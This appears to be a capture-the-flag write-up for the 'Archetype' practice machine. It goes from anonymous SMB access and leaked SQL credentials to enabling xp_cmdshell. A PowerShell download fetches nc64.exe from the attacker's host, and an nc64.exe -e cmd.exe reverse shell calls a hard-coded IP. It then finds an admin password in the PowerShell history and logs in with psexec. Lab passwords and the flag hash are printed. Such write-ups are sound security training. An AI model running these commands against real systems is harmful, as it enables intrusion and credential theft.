Archetype

6MB

Archetype_Write_Up.pdf

pdf

Task 1: Which TCP port is hosting a database server?

• Run quick nmap scan

nmap [Target IP]

Port 1433 is hosting a Microsoft SQL Server.

Task 2: What is the name of the non-Administrative share available over SMB?

• Run the following command

smbclient -N -L \\\\[Target IP]\\

• -N suppresses the password prompt

• -L specifies for a list of available shares

Looks like the non-administrative share is backups.

Task 3: What is the password identified in the file on the SMB share?

• Typically there is an anonymous account that can be used to access public shares.

• Run the following and hit enter when asked for a password.

smbclient \\\\[Target IP]\\backups -U Anonymous

• This shows a file in there. Run the following to download the file to your host machine.

get prod.dtsConfig

• Cat the file.

• This shows a password of M3g4c0rp123 for user sql_svc and for host ARCHETYPE

Task 4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

• On Kali, cd into the directory that typically houses impacket tools.

/usr/share/doc/python3-impacket/examples

• The module that can be used to establish a connection to a MS SQL Server is mssqlclient.py

Task 5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

• Run the following to use the tool with the credentials we recovered from the previous challenge.

python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth

• Utilizing the -windows-auth flag will use Windows Authentification

• Then run:

help

• This will display the different options which shows xp_cmdshell will execute a command shell

Task 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?

• Similar to linPEAS we can use winPEAS to search for privilege escalation paths. Use the link below to download the winPEAS exe.

https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe

Task 7: What file contains the administrator's password?

Here are two links to the means of working with this tool and interacting with the database.

MSSQL Injection Cheat Sheetpentestmonkey

1433 - Pentesting MSSQL - Microsoft SQL ServerHackTricks

• First start by enabling the command shell

enable_xp_cmdshell

• Now you can run command shell commands with the following:

xp_cmdshell [CMD]

• We will want to run command with powershell so we will need to input commands in this format:

xp_cmdshell "powershell -c [Command]"

• The -c flag issues the command in powershell

• We will not be able to download files to the current directory because we are in the systems folder which means we would need to be the administrator to do it.

• We can however download it in the user, sql_svc, Download folder. This directory should be:

C:\Users\sql_svc\Downloads

• Next is to download a reverse shell for Windows called nc64.exe.

• Start up a python web server in the directory that you downloaded the reverse shell in.

python3 -m http.server 80

• Next is to download the reverse shell from the python web server from the target machine with the following command:

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://[Host IP]/nc64.exe -outfile nc64.exe"

• Verify it was successful by checking the web server

• Start up a netcat listener to port 443 which the reverse shell will connect back to:

nc -lvnp 443

• Next is to run the reverse shell from the target machine in the Downloads folder.

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.15.41 443"

• Now check the netcat listener you have set up. You should now have a reverse shell to the system.

• Now that we have an interactive shell with the target machine, let's download winPEAS and run it on the target machine.

• Start by downloading winPeas to your host machine and move to the folder that you still have the python web server running on.

• On your reverse shell redirect to the Downloads folder which you can download files to as the current user.

cd C:\Users\sql-svc\Downloads

• Run the following command to run powershell for the remaining commands.

powershell

• Run the next command to download winPEAS to the target machine from the python web server.

wget http://[Host IP]/winPEASx64.exe -outfile winPEASx64.exe

• Now we want to run winPEAS on the target machine. This will auto-enumerate the machine to look for possible privilege escalation paths and other useful information.

.\winPEASx64.exe

• At the end of the analysis it will kick out some files it found that it believes are important.

• The answer to this task is ConsoleHost_history.txt

Capture User Flag:

• The flag can be found in C:\Users\sql-svc\Desktop\user.txt . Run the following to view it.

type C:\Users\sql_svc\Desktop\user.txt

Capture Root Flag:

• Looking through the winPEAS output we have found that SeImpersonatePrivilege is enabled

• This can be exploited using Juicy Potatoes.

• Before we do that though, let's check the ConsoleHost_history.txt file which is similar to .bash_history file for linux. This will display past commands that were run which may include some important information.

• Redirect to the following directory and run type to view the file:

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

• Looks like we have some juicy credentials for the administrator. Their password is MEGACORP_4dm1n!!

• Let's open a new tab on the host machine and use the psexec.py tool from Impacket to login to the administrator's account.

cd /usr/share/doc/python3-impacket/examples

python3 psexec.py administrator@[Target IP]

• The root.txt file is on the administrator's desktop. Run the following to view the file.

type C:\Users\Administrator\Desktop\root.txt

• The flag is b91ccec3305e98240082d4474b848528